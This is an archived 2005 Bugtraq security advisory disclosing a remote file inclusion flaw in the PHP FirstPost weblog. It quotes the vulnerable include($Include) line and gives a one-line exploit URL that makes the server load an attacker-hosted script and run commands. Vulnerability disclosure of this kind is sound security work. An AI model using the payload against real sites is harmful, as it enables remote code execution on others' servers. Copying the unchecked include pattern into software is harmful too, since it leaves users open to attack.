Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

PHP FirstPost remote file include vulnerability

from [gb . network] Network Security [Permanent Link]
Subject: PHP FirstPost remote file include vulnerability
Date: 24 Jul 2005 01:53:18 -0000 
Language: PHP
Project name: PHP FirstPost
Risk:High
Home page: http://phpfirstpost.sourceforge.net
Discovered by: ][GB][

[Description]:

PHP FirstPost is yet another PHP weblog. This one, however, is based
on Scoop, and has the open submission queue and comment rating system.

A vulnerability exists in PHP FirstPost, which could allow any remote
user to include a php script for execute arbitrary commands on the
target system.

[Details]:

The problem exists is in the file "block.php" when includes the
variable $Include

<?php if($Include) { include($Include); }; ?>

[Exploitation example]:

http://[target]/path_to_script/block.php?Include=http://[attacker]/cmd.gif?&cmd=|command|

[Credits]:
thanks to Zetha

also greetz to:
uyx
r3v3ng4ns
b-04
LINUX
HaCkZaTaN
beford
Mafia_boy
lithyum
darksteel
caffa
nologro
unicked

... and all the ppl of irc.gigachat.net #Uruguay, #ASC & #SWC
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • PHP FirstPost remote file include vulnerability, gb . network <=
Previous by Date:  Arbitrary code execution in SlimFTPd v3.16 - Exploit, redsand
Next by Date:  ECI router login bypass, D .
Previous by Thread:  [Conectiva-updates] [CLA-2005:980] Conectiva Security Announcement - php4, Conectiva Updates
Next by Thread:  ECI router login bypass, D .
Indexes:  [Date] [Thread] [Top] [All Lists]